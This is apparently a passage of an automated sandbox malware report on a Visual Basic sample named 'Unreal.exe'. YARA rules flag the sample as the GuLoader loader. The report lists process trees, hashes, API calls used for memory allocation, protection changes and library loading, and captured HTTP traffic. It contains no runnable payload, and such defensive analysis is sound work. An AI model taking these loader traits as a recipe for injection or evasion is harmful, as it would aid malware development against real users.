2021-09-27 18:54:19 UTC	0	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 x-chromium-appcache-fallback-override: disallow-fallback P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'nonce-zmJa6o19NNZGxnDADiVTMg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Date: Mon, 27 Sep 2021 18:54:19 GMT Expires: Mon, 27 Sep 2021 18:54:19 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=ODlPQgXqu4fdjG6ZuHTs0XNElZYDpXm1vg6AmQltuVvHl0JsiakjSgV63pH6LJnzsT27OHd1ZwOj3TF0GiES08RkNtz9RFmZ-4zBpdXmGWfyTjPaYTA5Duyff1r4XtXVZBFi2lZx3mEw_9SnPrYs2NcLj3JlA4yzX0915aFt1IY; expires=Tue, 29-Mar-2022 18:54:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-09-27 18:54:19 UTC	1	IN	Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#00000
2021-09-27 18:54:19 UTC	1	IN	Data Raw: 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: 0"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
2021-09-27 18:54:19 UTC	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Unreal.exe PID: 5360 Parent PID: 7912

General

Start time:	20:53:09
Start date:	27/09/2021
Path:	C:\Users\user\Desktop\Unreal.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Unreal.exe'
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	35A93D1F2EDC044B3D8289ABFEB17A43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 6992 Parent PID: 5360

General

Start time:	20:53:46
Start date:	27/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Unreal.exe'
Imagebase:	0xdd0000
File size:	53248 bytes
MD5 hash:	A64DACA3CFBCD039DF3EC29D3EDDD001
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.18420827212.00000000011A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.18430470714.00000000011A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 7000 Parent PID: 6992

General

Start time:	20:53:47
Start date:	27/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6719c0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: WerFault.exe PID: 3316 Parent PID: 6992

General

Start time:	20:58:17
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 1260
Imagebase:	0x9c0000
File size:	482640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Unreal.exe PID: 5360 Parent PID: 7912 Unreal.exeCOMMON

Executed Functions

Function 00414610, Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 401COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401196), ref: 0041462E
#648.MSVBVM60(0000000A), ref: 00414685
__vbaFreeVar.MSVBVM60 ref: 00414692
#593.MSVBVM60(0000000A), ref: 004146B1
__vbaFreeVar.MSVBVM60 ref: 004146BD
__vbaOnError.MSVBVM60(000000FF), ref: 004146CC
__vbaOnError.MSVBVM60(00000000), ref: 004146DB
#582.MSVBVM60(00000000,00000000), ref: 004146EC
__vbaFpR8.MSVBVM60 ref: 004146F2
#541.MSVBVM60(0000000A,15:15:15), ref: 00414719
__vbaStrVarMove.MSVBVM60(0000000A), ref: 00414723
__vbaStrMove.MSVBVM60 ref: 0041472E
__vbaFreeVar.MSVBVM60 ref: 00414737
__vbaNew2.MSVBVM60(0041438C,004162D4), ref: 00414757
__vbaHresultCheckObj.MSVBVM60(00000000,?,00414378,00000014), ref: 004147BD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041439C,000000D8), ref: 00414820
__vbaStrMove.MSVBVM60 ref: 00414851
__vbaFreeObj.MSVBVM60 ref: 0041485A
#532.MSVBVM60(Specting7), ref: 0041486C
__vbaHresultCheckObj.MSVBVM60(?,?,00414278,000006F8), ref: 00414941
__vbaHresultCheckObj.MSVBVM60(00000000,?,00414248,000002B4), ref: 00414995
#595.MSVBVM60(00004003,00000000,0000000A,0000000A,?), ref: 00414A5B
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,?), ref: 00414A6F
__vbaFreeStr.MSVBVM60(00414AC4), ref: 00414AB4
__vbaFreeStr.MSVBVM60 ref: 00414ABD

Strings

Specting7, xrefs: 00414867
15:15:15, xrefs: 00414710

Memory Dump Source

Source File: 00000001.00000002.16395530266.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.16395501276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.16395662929.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.16395694612.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$Error$#532#541#582#593#595#648ChkstkListNew2
String ID: 15:15:15$Specting7
API String ID: 4146733498-3993399904
Opcode ID: 3c19b350244f7a997bcc6d10953a02874933c961070751193c27143c43868876
Instruction ID: 5f9f51a66d304f39a9c33e4817ea7bc3dbc15a7f6d603ecbc25c27219b531422
Opcode Fuzzy Hash: 3c19b350244f7a997bcc6d10953a02874933c961070751193c27143c43868876
Instruction Fuzzy Hash: 7E0216B4901259EFDB14DF90CD88BDDBBB4FB48304F10819AE549BB2A0D7785A84CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004012D4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 004012D9

Strings

VB5!6&*, xrefs: 004012D4

Memory Dump Source

Source File: 00000001.00000002.16395530266.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.16395501276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.16395662929.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.16395694612.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 12fb11b6a79087246e86ef19f1addd359324f40b101fcb8d02bc8f309d971a70
Instruction ID: eae28493d6a045f80a0c899f4850ba8c675f22097e2f31701147fe64f079a303
Opcode Fuzzy Hash: 12fb11b6a79087246e86ef19f1addd359324f40b101fcb8d02bc8f309d971a70
Instruction Fuzzy Hash: 8BD0B65264F3C01EC303237168220816FB00D4361030B00E7D080EE0B3D00C088CC377

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00414E60, Relevance: 71.0, APIs: 47, Instructions: 452COMMON

Download Yara Rule

APIs

#713.MSVBVM60(004143E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00401196), ref: 00414EA8
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401196), ref: 00414EB3
__vbaStrCmp.MSVBVM60(004143F4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401196), ref: 00414EBF
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401196), ref: 00414ED2
__vbaRedim.MSVBVM60(00000080,00000002,?,00000002,00000001,00000012,00000000), ref: 00414EF3
__vbaGenerateBoundsError.MSVBVM60 ref: 00414F1B
__vbaGenerateBoundsError.MSVBVM60 ref: 00414F2B
__vbaGenerateBoundsError.MSVBVM60 ref: 00414F57
__vbaGenerateBoundsError.MSVBVM60 ref: 00414F61
__vbaGenerateBoundsError.MSVBVM60 ref: 00414F8D
__vbaGenerateBoundsError.MSVBVM60 ref: 00414F97
__vbaGenerateBoundsError.MSVBVM60 ref: 00414FC3
__vbaGenerateBoundsError.MSVBVM60 ref: 00414FCD
__vbaGenerateBoundsError.MSVBVM60 ref: 00414FF9
__vbaGenerateBoundsError.MSVBVM60 ref: 00415003
__vbaGenerateBoundsError.MSVBVM60 ref: 0041502F
__vbaGenerateBoundsError.MSVBVM60 ref: 00415039
__vbaGenerateBoundsError.MSVBVM60 ref: 00415065
__vbaGenerateBoundsError.MSVBVM60 ref: 0041506F
__vbaGenerateBoundsError.MSVBVM60 ref: 0041509B
__vbaGenerateBoundsError.MSVBVM60 ref: 004150A5
__vbaGenerateBoundsError.MSVBVM60 ref: 004150D1
__vbaGenerateBoundsError.MSVBVM60 ref: 004150DB
__vbaGenerateBoundsError.MSVBVM60 ref: 00415107
__vbaGenerateBoundsError.MSVBVM60 ref: 00415111
__vbaGenerateBoundsError.MSVBVM60 ref: 0041513D
__vbaGenerateBoundsError.MSVBVM60 ref: 00415147
__vbaGenerateBoundsError.MSVBVM60 ref: 00415173
__vbaGenerateBoundsError.MSVBVM60 ref: 0041517D
__vbaGenerateBoundsError.MSVBVM60 ref: 004151A9
__vbaGenerateBoundsError.MSVBVM60 ref: 004151B3
__vbaGenerateBoundsError.MSVBVM60 ref: 004151DF
__vbaGenerateBoundsError.MSVBVM60 ref: 004151E9
__vbaGenerateBoundsError.MSVBVM60 ref: 00415215
__vbaGenerateBoundsError.MSVBVM60 ref: 0041521F
__vbaGenerateBoundsError.MSVBVM60 ref: 0041524B
__vbaGenerateBoundsError.MSVBVM60 ref: 00415255
__vbaGenerateBoundsError.MSVBVM60 ref: 00415281
__vbaGenerateBoundsError.MSVBVM60 ref: 0041528B
__vbaGenerateBoundsError.MSVBVM60 ref: 004152B7
__vbaGenerateBoundsError.MSVBVM60 ref: 004152C1
__vbaNew2.MSVBVM60(0041438C,004162D4), ref: 004152E1
__vbaHresultCheckObj.MSVBVM60(00000000,02AC004C,00414378,00000014), ref: 0041530C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041439C,00000078), ref: 00415334
__vbaFreeObj.MSVBVM60 ref: 00415339
__vbaHresultCheckObj.MSVBVM60(00000000,00401180,00414248,00000254), ref: 00415362
__vbaAryDestruct.MSVBVM60(00000000,?,0041538B), ref: 00415384

Memory Dump Source

Source File: 00000001.00000002.16395530266.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.16395501276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.16395662929.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.16395694612.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$BoundsErrorGenerate$CheckHresult$Free$#713DestructMoveNew2Redim
String ID:
API String ID: 58225848-0
Opcode ID: 55597f09d81c99a19fc9b46ab2849b01153f8409f8f86cdfbd7813b32d4e4f50
Instruction ID: 05e61b26f8d52e1746c9c80d715b7f81e21d321a5afcf69a3e66fbe9a8008d5b
Opcode Fuzzy Hash: 55597f09d81c99a19fc9b46ab2849b01153f8409f8f86cdfbd7813b32d4e4f50
Instruction Fuzzy Hash: DB024A35A0061ACBCB14EFA4C5819FEFBB5AF85304F21416AC9026B790D775ACC7CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414CA0, Relevance: 16.6, APIs: 11, Instructions: 128COMMON

Download Yara Rule

APIs

__vbaHresultCheckObj.MSVBVM60(00000000,?,00414248,00000114), ref: 00414CFD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00414248,00000110), ref: 00414D26
#554.MSVBVM60 ref: 00414D32
__vbaNew2.MSVBVM60(0041438C,004162D4), ref: 00414D4A
__vbaHresultCheckObj.MSVBVM60(00000000,02AC004C,00414378,00000014), ref: 00414D6F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041439C,000000C0), ref: 00414D95
__vbaFreeObj.MSVBVM60 ref: 00414D9A
__vbaNew2.MSVBVM60(0041438C,004162D4), ref: 00414DB2
__vbaHresultCheckObj.MSVBVM60(00000000,02AC004C,00414378,00000034), ref: 00414DFC
__vbaObjSet.MSVBVM60(?,?), ref: 00414E0D
__vbaFreeObj.MSVBVM60(00414E35), ref: 00414E2E

Memory Dump Source

Source File: 00000001.00000002.16395530266.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.16395501276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.16395662929.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.16395694612.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$#554
String ID:
API String ID: 420915087-0
Opcode ID: bc259f7e016f157a75e6de2a4ff6ef7d57a7aaea0983f664e82ff4718ab796d7
Instruction ID: 9ad67d717651f06e4d8735d053d3e89020d3d354963e254ec6265aedec3f33d7
Opcode Fuzzy Hash: bc259f7e016f157a75e6de2a4ff6ef7d57a7aaea0983f664e82ff4718ab796d7
Instruction Fuzzy Hash: DC41B270941318ABDB04EF94DD89EDEBBB8FF48705F21406AF544B7290C7B4A984CB68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 6992 Parent PID: 5360 RegAsm.exeCOMMON

Executed Functions

Function 011AE567, Relevance: 10.3, APIs: 1, Strings: 4, Instructions: 1529COMMON

Download Yara Rule

Strings

<M, xrefs: 011AEEA5
Ea^_, xrefs: 011A8967
:b, xrefs: 011A8D29
+dDe, xrefs: 011AE8C6

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: +dDe$:b$Ea^_$<M
API String ID: 2706961497-2267300782
Opcode ID: e497b4d9ddf29964ff756103764756ff7f64bb37b3dff5d6a7430b15798eafe5
Instruction ID: dd8821eb37cdb5f09074fbe7cf2aa6bfb5140530315adbf172eb7ab83fb0e259
Opcode Fuzzy Hash: e497b4d9ddf29964ff756103764756ff7f64bb37b3dff5d6a7430b15798eafe5
Instruction Fuzzy Hash: 94D22675604386DFDB399F38C9947EA7FA2AF56350F85821ECC8A8B295D3308645CB12

Uniqueness

Uniqueness Score: -1.00%

Function 011AFA0B, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 011B0137

Strings

r)P/, xrefs: 011AFFFA

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID: r)P/
API String ID: 2335996259-3330583145
Opcode ID: c78f0c75422cd4b0ad41db9d460bb71d7065b0e18c22ed223e4fc3152abdbd2c
Instruction ID: 5d1752035a3579a7650fafc5daebf554f0d57734bcbcd280a9ae3a9389dcf7da
Opcode Fuzzy Hash: c78f0c75422cd4b0ad41db9d460bb71d7065b0e18c22ed223e4fc3152abdbd2c
Instruction Fuzzy Hash: 1B81F374608346CFDF3DDE7889A47EF3BB2AF5A350F91812ADC0A8B255D73185468B42

Uniqueness

Uniqueness Score: -1.00%

Function 011AA31F, Relevance: 3.3, APIs: 2, Instructions: 291memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-A9BE32F9,?,3EB49220), ref: 011AA5CE

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: a3f45f28f2b84c8b0f67692049f2fcb9e6b81560d1ac47abce92efb7c5f21876
Instruction ID: c91319ecc010a30fc331bc996fb25fbfa68749cefabefbd2927c2b1e930a1cc8
Opcode Fuzzy Hash: a3f45f28f2b84c8b0f67692049f2fcb9e6b81560d1ac47abce92efb7c5f21876
Instruction Fuzzy Hash: 29B18879508399DFCF389E68AD543EA3FA1AF15350F85421FDC8A9B281D3314A42CB97

Uniqueness

Uniqueness Score: -1.00%

Function 011A000A, Relevance: 2.0, APIs: 1, Instructions: 492COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fc83c5266a424331515904e75d684a9ee922dc722d348ec69505dbe3750bf40
Instruction ID: 934ba46df403e9333b295f0348a5a74dc7f93ed9d435d916d6eb6fefed837cd1
Opcode Fuzzy Hash: 1fc83c5266a424331515904e75d684a9ee922dc722d348ec69505dbe3750bf40
Instruction Fuzzy Hash: 50F17F1D68C7C1CAEB2A96FA5A153DA3F655FA6700FA4414FE9584F293C3B24102D3D3

Uniqueness

Uniqueness Score: -1.00%

Function 011A9E3B, Relevance: 1.8, APIs: 1, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 99ef27495cbc98beb9e82444a9015e54015695f57095907df0154ca4bc82c60d
Instruction ID: 02721c0e3be6df933949a21ab3f3061c36a63117cd90ec5038b322da71e3b8b4
Opcode Fuzzy Hash: 99ef27495cbc98beb9e82444a9015e54015695f57095907df0154ca4bc82c60d
Instruction Fuzzy Hash: 45B17539508395DBDF399EA8AD553EA3FA4AF22310F85021FDC8A5B291D3714942CBC3

Uniqueness

Uniqueness Score: -1.00%

Function 011AF3D0, Relevance: 1.5, APIs: 1, Instructions: 45nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-E44808FE,?,?,?,?,011AE64E), ref: 011AF4D8

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: ccb2ae07d4aea1150e544c8451e9679756a3256d611e3da2fb7ddc8a82f92f72
Instruction ID: 33584dac762869f7ff9d9e1aeab39469fe96e53a9840cd0b84e165eb74b47f7b
Opcode Fuzzy Hash: ccb2ae07d4aea1150e544c8451e9679756a3256d611e3da2fb7ddc8a82f92f72
Instruction Fuzzy Hash: 03018C746052868BCB38DE2CCD047EEB7BAAFE4350F85812ADC099B648D730AA01CB11

Uniqueness

Uniqueness Score: -1.00%

Function 011AD0EF, Relevance: 1.7, APIs: 1, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b431922d497ff575fbe355d4c7817564663f463395acce2d9474c86a15ef485
Instruction ID: a309ee163a6c8b25383e5d85e802e825a3eef54ebcfe3addf57350410f5fdeeb
Opcode Fuzzy Hash: 6b431922d497ff575fbe355d4c7817564663f463395acce2d9474c86a15ef485
Instruction Fuzzy Hash: EC51F27960425ADFCF38DF28DD907D93BA1AF58360F95412AEC4D9B240D730AE42CB55

Uniqueness

Uniqueness Score: -1.00%

Function 011AB4E9, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d434a30a572acbac7c240fcc93681b6d40f7b10ea892e40ed837c78206a3f557
Instruction ID: 26af4728614bb0eb2395486039f2e6df1f38e371a39e1bc7a596969280f74d0d
Opcode Fuzzy Hash: d434a30a572acbac7c240fcc93681b6d40f7b10ea892e40ed837c78206a3f557
Instruction Fuzzy Hash: 9F412D7860434ACFCF3CAEB8AD543E93BA1AF55764F90412A9C4ACB544E7308582CB17

Uniqueness

Uniqueness Score: -1.00%

Function 011AA080, Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?), ref: 011AA1EB

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2bf024cd2d2391834c613bcd02e998c95214c99765cb33d173daa583900154b7
Instruction ID: cc38956846d57f8c7cbf90f9fa7f322bea728b635d32a52de18f8a67a49a79c2
Opcode Fuzzy Hash: 2bf024cd2d2391834c613bcd02e998c95214c99765cb33d173daa583900154b7
Instruction Fuzzy Hash: B421F371624304DFEBB89E25D848BDB77E6AFA4600F46891EDCC983514D3718980CF93

Uniqueness

Uniqueness Score: -1.00%

Function 011ACF09, Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,000028EA), ref: 011AD0D9

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6b74e0dadec7b94f5d35131a0ca9f65ac9c2f719595ed723f72dec1d939a4ebc
Instruction ID: d6bde01ce5c61f2facee574a5c71c2df8d1b53a316b3136619c5a76f079aa87f
Opcode Fuzzy Hash: 6b74e0dadec7b94f5d35131a0ca9f65ac9c2f719595ed723f72dec1d939a4ebc
Instruction Fuzzy Hash: E601AF7470878ADFCF389E2CCD987DA3BE5AF58350F4442399C1DCA244E7308A428705

Uniqueness

Uniqueness Score: -1.00%

Function 011A1040, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

EnumWindows.USER32(000000E9,00000074), ref: 011A104F

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 6a6a4a1980f5a6f3d5ca7ce98a214b0770ea7e7f7c2cd30b5eeccfa894744e8c
Instruction ID: f4852139dc47dd8ae5136f4b4a09ec530642abd9f4ff992293e83f5d9c4c702e
Opcode Fuzzy Hash: 6a6a4a1980f5a6f3d5ca7ce98a214b0770ea7e7f7c2cd30b5eeccfa894744e8c
Instruction Fuzzy Hash: EBC08C35258407EBC71CEA90EAC92C73362AB6C2A0FE80004E80A91002E3300882C912

Uniqueness

Uniqueness Score: -1.00%

Function 011A1070, Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

EnumWindows.USER32(000000E9,00000074), ref: 011A104F

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: f9e91717bc3f4d33d8f4a88cc5b16215f5163b77719ad333d033fe21d7b76e13
Instruction ID: d27ab66624f08a768fb5ff19fb71b8a52517d6cf86670a212d3303fe7d0e9a57
Opcode Fuzzy Hash: f9e91717bc3f4d33d8f4a88cc5b16215f5163b77719ad333d033fe21d7b76e13
Instruction Fuzzy Hash: 50C0123528C581EAD61DA6C5DAC57967775575D280FA4040AD11946152C7250146C352

Uniqueness

Uniqueness Score: -1.00%

Function 011A3700, Relevance: 1.3, APIs: 1, Instructions: 4sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000072), ref: 011A3707

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 58e672034f51bc2533a42afd68be0999d7ff1a54170e46d243e4de427f5da9df
Instruction ID: 67ff0fcdbc1e57b19a01a4702782976c2e2f7aef2ae8979e41a0d6b0ed129c35
Opcode Fuzzy Hash: 58e672034f51bc2533a42afd68be0999d7ff1a54170e46d243e4de427f5da9df
Instruction Fuzzy Hash: 35B01210148780D2F3280710C80EF65BD511B02201F00004C81CA84482476454004153

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 011AE2B0, Relevance: 6.7, Strings: 3, Instructions: 2943COMMON

Download Yara Rule

Strings

x&c, xrefs: 011B0843
Ea^_, xrefs: 011A8967
:b, xrefs: 011A8D29

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: :b$Ea^_$x&c
API String ID: 0-503245694
Opcode ID: fa870e18b066a4113d66aaeb486db62a49f44fc3b2357c1dca950130516d8705
Instruction ID: bc5820ed375b4a8ba444158c2443fa5f7df23c243b52367a7d564739259583d0
Opcode Fuzzy Hash: fa870e18b066a4113d66aaeb486db62a49f44fc3b2357c1dca950130516d8705
Instruction Fuzzy Hash: 8CB2737560838ADFDB289F3889953DABBB2FF56340F85411EDD898B255D3308A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 011A95CB, Relevance: 3.4, Strings: 2, Instructions: 947COMMON

Download Yara Rule

Strings

Ea^_, xrefs: 011A8967
:b, xrefs: 011A8D29

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: :b$Ea^_
API String ID: 0-1604152765
Opcode ID: b9d6d1786ef39d44903816f5576a2b42ed2582ec05c59b068eeb1ef2c45eed27
Instruction ID: d395175b80aea755432ec8a0f5b0d7aff55fddbea896946bbfaf6546d9787a3e
Opcode Fuzzy Hash: b9d6d1786ef39d44903816f5576a2b42ed2582ec05c59b068eeb1ef2c45eed27
Instruction Fuzzy Hash: 0D82437960434ADFDB389E38CD947EA7BA2FF55340F85412EDD8A9B254D3318A85CB02

Uniqueness

Uniqueness Score: -1.00%

Function 011A9515, Relevance: 3.4, Strings: 2, Instructions: 910COMMON

Download Yara Rule

Strings

Ea^_, xrefs: 011A8967
:b, xrefs: 011A8D29

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: :b$Ea^_
API String ID: 0-1604152765
Opcode ID: 0af2e49a00e6adbd83cc37381f6209ba8cdf6cce6ad90972c670476c003ca1b2
Instruction ID: cb0d9aec129405b7375d3d8c07304b37ca48c059a25bceb20fad3f8ed017452b
Opcode Fuzzy Hash: 0af2e49a00e6adbd83cc37381f6209ba8cdf6cce6ad90972c670476c003ca1b2
Instruction Fuzzy Hash: 1972407560434ADFDB389E38C9A57EA7BB2FF55340F85421EDC8A9B254D3318A85CB02

Uniqueness

Uniqueness Score: -1.00%

Function 011A0AC4, Relevance: 3.4, Strings: 2, Instructions: 856COMMON

Download Yara Rule

Strings

Ea^_, xrefs: 011A8967
:b, xrefs: 011A8D29

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: :b$Ea^_
API String ID: 0-1604152765
